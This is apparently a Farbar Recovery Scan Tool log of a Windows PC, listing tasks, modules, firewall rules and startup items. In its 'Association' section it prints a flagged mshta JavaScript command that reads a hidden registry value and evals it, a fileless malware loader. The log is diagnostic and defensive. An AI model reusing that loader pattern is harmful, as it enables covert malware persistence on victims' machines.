Works Synchronization (x32 Version: 1.0.0.0000 - Your Company Name) Hidden

XSplit Gamecaster (HKLM-x32\...\{D3C9DBAA-5395-4971-A962-553C7DBEA423}) (Version: 2.8.1605.2355 - SplitmediaLabs)

 

==================== Custom CLSID (Whitelisted): ==========================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

CustomCLSID: HKU\S-1-5-21-23814709-2432651133-2868963390-1010_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\banie_000\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe (Microsoft Corporation)

CustomCLSID: HKU\S-1-5-21-23814709-2432651133-2868963390-1010_Classes\CLSID\{A416C15B-A073-4994-8DB5-87527A41B2FA}\localserver32 -> C:\Program Files\Telestream\Wirecast\Wirecast.exe (Telestream LLC)

 

==================== Scheduled Tasks (Whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

Task: {0595F72E-12EE-4108-9DD3-980B0523E243} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION

Task: {0911E052-05E2-43ED-B926-9AF86A085037} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe [2016-09-17] (Microsoft Corporation)

Task: {0A7D88E8-273E-4249-AFBD-5DE99EAD2230} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION

Task: {0B99FE8E-5C4E-4FBF-B2E5-18CF682E65BA} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-23814709-2432651133-2868963390-1001Core => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe [2015-04-30] (Google Inc.)

Task: {12567C4C-6275-49A6-94D2-85BA90A7E4BB} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)

Task: {13FF8C06-FE50-49A8-8BF7-55D5996E002F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-11-16] (Piriform Ltd)

Task: {14723927-21E7-4192-AA2E-8A7BB96BF694} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION

Task: {14934DB7-80E7-4945-BA3E-BB6493EFAEED} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-10-13] (Microsoft Corporation)

Task: {1961BC23-D3DE-42A8-A9D3-40B225A9D03A} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2014-06-18] (CyberLink Corp.)

Task: {197C010B-A014-4D1D-B300-74902522D0B1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION

Task: {1DA5565F-E46B-4E04-A4B4-AAED3B871D30} - System32\Tasks\{7710BCDD-6C09-4CB1-A71B-FCC26146EBCA} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Games\Microsoft Flight Simulator X\fsx.exe" -d "C:\Program Files (x86)\Microsoft Games\Microsoft Flight Simulator X"

Task: {1DC567B9-5191-41F9-A428-730C87480BB1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-06-03] (Hewlett-Packard Company)

Task: {1F6A8E16-185C-4D5C-A509-6E22FF483A41} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)

Task: {21E0A627-873B-485D-9686-D30155D725EE} - System32\Tasks\{7D00BB86-2DF0-4DAB-B9C2-C93C1A87D27D} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Works\msworks.exe" -d "C:\Program Files (x86)\Microsoft Works\"

Task: {21F20494-8293-4836-9B4B-CE2666CF6C8F} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)

Task: {236E1606-C3C5-4DE0-A2CB-3B2AC55430FB} - System32\Tasks\{E0ECFA91-F43E-4FDF-B737-56F17C718F89} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Games\Microsoft Flight Simulator X\fsx.exe" -d "C:\Program Files (x86)\Microsoft Games\Microsoft Flight Simulator X\"

Task: {248F194E-04D3-4120-8D3F-E5C8F901FF62} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-04-19] (Google Inc.)

Task: {2695FA5C-E58D-4257-A062-A17BC7246BD0} - \WPD\SqmUpload_S-1-5-21-23814709-2432651133-2868963390-1002 -> No File <==== ATTENTION

Task: {346BF31E-4312-491E-B039-DFA8EAEBD295} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2014-03-19] (Microsoft)

Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe

Task: {3765453C-8732-4387-85C7-D009F2034F5F} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION

Task: {3ABC9794-23A7-449A-8D9C-5BEAFDBEAD7E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-23814709-2432651133-2868963390-1001UA => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe [2015-04-30] (Google Inc.)

Task: {3FB3E07E-E3DC-4966-841B-BA67461EF69E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION

Task: {3FE66C65-90C0-4CA3-901E-D0F21C574A09} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)

Task: {40307EAD-6B8C-4B91-B4C8-89F055335924} - System32\Tasks\HPCustParticipation HP ENVY 7640 series => C:\Program Files\HP\HP ENVY 7640 series\Bin\HPCustPartic.exe [2014-08-22] (Hewlett-Packard Development Company, LP)

Task: {46E1B886-D881-4709-BBB6-E48C1EF3F385} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-01-21] (Hewlett-Packard)

Task: {656DFAA8-4CC6-43EF-A04A-C010E30EE928} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-10-08] (Microsoft Corporation)

Task: {6ADCC82D-62D3-40BC-88D6-F88E827ACFBA} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2016-07-07] (McAfee, Inc.)

Task: {6E5BDD10-B113-47F4-8567-429734B8802A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-06-03] (Hewlett-Packard Company)

Task: {778288B3-024B-421B-BE1C-CBE64A0EC259} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-10-11] (Adobe Systems Incorporated)

Task: {8205452E-A6BF-4CC3-BBE8-7070E746F533} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)

Task: {89669F5C-437E-45EA-B340-11C685DD5B38} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2016-05-18] (McAfee, Inc.)

Task: {8A7A62FD-42C5-46F4-8097-0D102A1134AD} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION

Task: {8F0C60FA-4D83-4693-A133-73DA5C0B6E9A} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)

Task: {8FBCD0AE-A33A-4B4C-BA23-D57452400BD2} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION

Task: {923970B7-2E94-4C0B-92E6-B5F8F234DDAD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-06-03] (Hewlett-Packard Company)

Task: {92EA0108-97C5-48B6-A01E-4EF66F48DCB2} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION

Task: {9A1DC356-8C33-4D38-ADCA-12845321603C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-04-19] (Google Inc.)

Task: {A74089B4-6591-4237-BE6D-61566D172504} - System32\Tasks\McAfee\McAfee Idle Detection Task

Task: {ACEF0F3E-9BE0-428E-BC43-B436A311C240} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION

Task: {ADE00F7A-FE8C-4F0C-BD02-D6D8205EDFC8} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-02-16] (McAfee, Inc.)

Task: {AEBC615D-C7F4-49C7-A82A-63E5E1A57BEE} - \WPD\SqmUpload_S-1-5-21-23814709-2432651133-2868963390-1010 -> No File <==== ATTENTION

Task: {B5253617-41AE-413C-A54A-4C7DD1B08BE6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)

Task: {C722424F-B46A-48C3-B68A-AF41A9637D67} - System32\Tasks\NCH Software\PrismDowngrade => C:\Users\Kyle Aniel\AppData\Roaming\NCH Software\Program Files\Prism\prism.exe [2016-07-28] (NCH Software)

Task: {CC2CDB61-4621-4142-96AC-17D14CA7A2B6} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent

Task: {D25DD6D3-0386-4B83-B8E5-66CBE076446B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_ERROR_HB => C:\WINDOWS\system32\MRT.exe [2016-10-13] (Microsoft Corporation)

Task: {D8FD2928-953B-4539-9562-E5B1A70CD61C} - System32\Tasks\{5F1B02E2-90C4-4F55-850F-B56519014C3E} => pcalua.exe -a "C:\Program Files\FlightGear 3.2.0\unins000.exe" -d "C:\Program Files\FlightGear 3.2.0"

Task: {E347EDD3-B535-424A-84DE-3F77F7AD3B1C} - \WPD\SqmUpload_S-1-5-21-23814709-2432651133-2868963390-1001 -> No File <==== ATTENTION

Task: {E9290A7E-B4F8-4290-BACB-B8A565D2080E} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION

Task: {F448E5DD-AD8C-4DED-8DC4-5A002721A697} - System32\Tasks\HPCeeScheduleForKYLE-PC$ => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)

Task: {F56C18F6-B7C3-4A27-B765-54B1164A7F89} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-10-08] (Microsoft Corporation)

Task: {FC336EBD-83F7-4457-B42E-660E62254C26} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2014-05-19] (Hewlett-Packard Development Company, L.P.)

Task: {FDA7C8B4-CF42-4418-A7C1-9F674EA1B267} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)

 

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

 

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-23814709-2432651133-2868963390-1001Core.job => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-23814709-2432651133-2868963390-1001UA.job => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe

Task: C:\WINDOWS\Tasks\HPCeeScheduleForbanie_000.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

Task: C:\WINDOWS\Tasks\HPCeeScheduleForKYLE-PC$.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

 

==================== Shortcuts =============================

 

(The entries could be listed to be restored or removed.)

 

Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\Ready For Pushback Boeing 747-200v2 FS2004\simpilot.com.lnk -> hxxp://simpilot.com/

Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\Ready For Pushback Boeing 747-200v2 FS2004\www.rikoooo.com.lnk -> hxxp://www.rikoooo.com/

Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\POSKY Embraer ERJ 145\www.projectopensky.com.lnk -> hxxp://www.projectopensky.com/

Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\POSKY Embraer ERJ 145\www.rikoooo.com.lnk -> hxxp://www.rikoooo.com/

Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\Posky Boeing 737-800 Okay Airways FSX\www.projectopensky.com .lnk -> hxxp://www.projectopensky.com/

Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\Posky Boeing 737-800 Okay Airways FSX\www.rikoooo.com.lnk -> hxxp://www.rikoooo.com/

Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\FSND McDonell-Douglas MD-83 FSX\www.rikoooo.com.lnk -> hxxp://www.rikoooo.com/

Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\FSND McDonell-Douglas MD-83 FSX\www.simviation.com fsnd.lnk -> hxxp://www.simviation.com/fsnd/

 

==================== Loaded Modules (Whitelisted) ==============

 

2016-07-16 04:42 - 2016-07-16 04:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll

2016-09-29 15:14 - 2016-09-15 10:25 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll

2014-03-28 13:31 - 2014-03-28 13:31 - 02110464 _____ () C:\Program Files\Hewlett-Packard\SimplePass\autheng.dll

2014-03-28 13:27 - 2014-03-28 13:27 - 00035328 _____ () C:\Program Files\Hewlett-Packard\SimplePass\ssplogon.dll

2014-03-28 13:27 - 2014-03-28 13:27 - 00021504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cryptodll.dll

2014-03-28 13:27 - 2014-03-28 13:27 - 00055296 _____ () C:\Program Files\Hewlett-Packard\SimplePass\RandomPass.dll

2014-03-28 13:48 - 2014-03-28 13:48 - 00367504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\mstrpwd.dll

2014-03-28 13:48 - 2014-03-28 13:48 - 00712080 _____ () C:\Program Files\Hewlett-Packard\SimplePass\GraphicalPwd.dll

2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll

2016-03-18 22:56 - 2016-03-18 22:56 - 01329936 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll

2016-09-25 20:48 - 2016-10-13 14:48 - 10220624 _____ () C:\Program Files\Gramblr\gramblr.exe

2016-09-29 15:14 - 2016-09-15 10:25 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll

2016-03-14 14:55 - 2016-10-08 00:52 - 08923840 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll

2014-03-28 13:36 - 2014-03-28 13:36 - 00065024 _____ () C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe

2016-09-16 05:02 - 2016-09-16 05:02 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll

2016-10-13 15:27 - 2016-10-05 02:35 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll

2016-10-13 15:28 - 2016-10-05 02:21 - 09760256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll

2016-10-13 15:28 - 2016-10-05 02:13 - 01401344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll

2016-10-13 15:28 - 2016-10-05 02:13 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll

2016-10-13 15:28 - 2016-10-05 02:13 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll

2016-10-13 15:28 - 2016-10-05 02:13 - 02424832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll

2016-10-13 15:28 - 2016-10-05 02:14 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll

2016-09-28 05:05 - 2016-09-28 05:05 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe

2016-09-28 05:05 - 2016-09-28 05:05 - 00178176 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll

2016-09-28 05:05 - 2016-09-28 05:05 - 35250688 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkyWrap.dll

2016-10-01 15:02 - 2016-10-01 15:02 - 00202240 _____ () C:\Users\Kyle Aniel\Downloads\AirMouse.exe

2015-07-10 06:16 - 2015-07-10 06:16 - 00117920 ____N () C:\Program Files\WindowsApps\Microsoft.ZuneMusic_3.6.25021.0_x64__8wekyb3d8bbwe\GNSDK_FP.DLL

2016-08-15 17:30 - 2016-08-15 17:31 - 00017408 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe

2016-08-15 17:30 - 2016-08-15 17:31 - 13475840 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll

2016-06-03 00:55 - 2016-06-03 01:01 - 00680448 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe\Microsoft.DesignCore.dll

2016-03-03 21:15 - 2016-03-03 21:17 - 00291328 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll

2016-08-26 11:30 - 2016-08-26 11:30 - 04746240 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1608.2312.0_x64__8wekyb3d8bbwe\Time.exe

2016-08-26 11:30 - 2016-08-26 11:30 - 01413120 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1608.2312.0_x64__8wekyb3d8bbwe\TimeBackground.dll

2016-10-13 15:28 - 2016-10-05 02:12 - 00114176 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Dss.BackgroundTask.dll

2014-12-26 11:02 - 2014-12-04 19:27 - 00055688 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\QtSolutions_Service-head.dll

2014-12-26 11:02 - 2014-12-04 19:27 - 00104328 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\qjson0.dll

2016-09-17 05:57 - 2016-09-17 05:57 - 01383616 _____ () C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\ClientTelemetry.dll

2014-08-11 09:06 - 2013-12-10 08:27 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

 

==================== Alternate Data Streams (Whitelisted) =========

 

(If an entry is included in the fixlist, only the ADS will be removed.)

 

AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]

AlternateDataStreams: C:\ProgramData\Temp:74603393 [144]

 

==================== Safe Mode (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SplashtopRemoteService => ""="Service"

 

==================== Association (Whitelisted) ===============

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

 

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Software\Classes\5623e: "C:\WINDOWS\system32\mshta.exe" "javascript:i8S1mD="m";n40z=new ActiveXObject("WScript.Shell");fuLa2="SrL4";f81HSI=n40z.RegRead("HKCU\\software\\dcyozhn\\eyzxwqjdey");mrBn9="j1V1";eval(f81HSI);adKr6SBm="t0nh";" <===== ATTENTION

 

==================== Internet Explorer trusted/restricted ===============

 

(If an entry is included in the fixlist, it will be removed from the registry.)

 

IE restricted site: HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\youtube.com -> www.youtube.com

 

==================== Hosts content: ===============================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2013-08-22 06:25 - 2013-08-22 06:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts

 

 

==================== Other Areas ============================

 

(Currently there is no automatic fix for this section.)

 

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Control Panel\Desktop\\Wallpaper -> E:\Misc\IMG_9250.JPG

HKU\S-1-5-21-23814709-2432651133-2868963390-1010\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg

DNS Servers: 192.168.1.1

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

Windows Firewall is enabled.

 

==================== MSCONFIG/TASK MANAGER disabled items ==

 

HKLM\...\StartupApproved\StartupFolder: => "Microsoft Office.lnk"

HKLM\...\StartupApproved\StartupFolder: => "Microsoft Works Calendar Reminders.lnk"

HKLM\...\StartupApproved\Run: => "SimplePass"

HKLM\...\StartupApproved\Run: => "OPBHOBroker"

HKLM\...\StartupApproved\Run: => "OPBHOBrokerDesktop"

HKLM\...\StartupApproved\Run: => "iTunesHelper"

HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"

HKLM\...\StartupApproved\Run32: => "ADSKAppManager"

HKLM\...\StartupApproved\Run32: => "ADSK DLMSession"

HKLM\...\StartupApproved\Run32: => "iSkysoft Helper Compact.exe"

HKLM\...\StartupApproved\Run32: => "PMBVolumeWatcher"

HKLM\...\StartupApproved\Run32: => "WorksFUD"

HKLM\...\StartupApproved\Run32: => "Microsoft Works Portfolio"

HKLM\...\StartupApproved\Run32: => "Microsoft Works Update Detection"

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk"

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "Skype"

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "Google Update"

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "OneDrive"

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "Power2GoExpress8"

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "BlueStacks Agent"

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "iFunBox"

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "MurGee.com Auto Clicker"

HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\StartupApproved\Run: => "OneDrive"

 

==================== FirewallRules (Whitelisted) ===============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139

FirewallRules: [UDP Query User{53794421-7821-4278-8BBF-741BA05AB330}C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe

FirewallRules: [TCP Query User{9FCA62F9-825D-496E-A932-0EED1260581B}C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe

FirewallRules: [{F14C8E4E-1B46-4AAC-97D1-94D40AE20ABA}] => (Allow) C:\Program Files\FlightGear 2016.2.1\bin\fgcom.exe

FirewallRules: [{8B921A85-A429-4280-B9FB-07CB855F9AEE}] => (Allow) C:\Program Files\FlightGear 2016.2.1\bin\fgfs.exe

FirewallRules: [{57F389DB-7222-4A70-83D6-662C742B15A0}] => (Allow) LPort=8317

FirewallRules: [{85C86D16-7CBD-49DB-AD69-7F297733EC65}] => (Allow) LPort=50001

FirewallRules: [{E1826D7F-6D7B-41D9-BB8B-73EFFEB1E640}] => (Allow) C:\Program Files\iTunes\iTunes.exe

FirewallRules: [{C8D63CDD-CB45-41E6-9676-C5235F513E50}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe

FirewallRules: [{A6035642-EFF6-4D3F-A471-8F29A46FE381}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe

FirewallRules: [{29458CC2-9F5A-4226-8F16-B8DCC1E9A280}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{9C04F057-2474-485A-B328-06C86CBE9AF6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{8078B494-1CD1-4E93-AF3D-325569171D51}] => (Allow) LPort=50000

FirewallRules: [{A2CCF995-5E8E-4066-80A8-AA998DCA6A80}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe

FirewallRules: [{44AEF0DF-9B4D-4FE6-B6E4-2BDE8ABE5EE1}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe

FirewallRules: [{3DD8C92C-1E2B-4B13-9BD8-0C413D7304F6}] => (Allow) C:\Users\Kyle Aniel\AppData\Roaming\McAfee\Supportability\MVTLogs\ProductDetection64.exe

FirewallRules: [{09095BAF-CFEA-4A62-A961-97CE70C0F14D}] => (Allow) C:\Users\Kyle Aniel\AppData\Roaming\McAfee\Supportability\MVTLogs\ProductDetection64.exe

FirewallRules: [{22A807EF-5700-42AB-AD50-A9315FFB0ACF}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe

FirewallRules: [{9F5506B2-FE5A-45A6-BE89-593AF24DA79D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [{149713C0-3A5B-4BA5-9CEC-10624D856994}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [{50A74DE0-4CF0-4436-A417-756FC22CFA0B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{0C08375C-3256-4D97-8C0C-F3B798874E9D}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{87934DC9-BB42-4A76-977F-7DB1AA22CE30}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe

FirewallRules: [{81D09C49-FCFC-4576-ADAB-3228E5E5812F}] => (Allow) LPort=1900

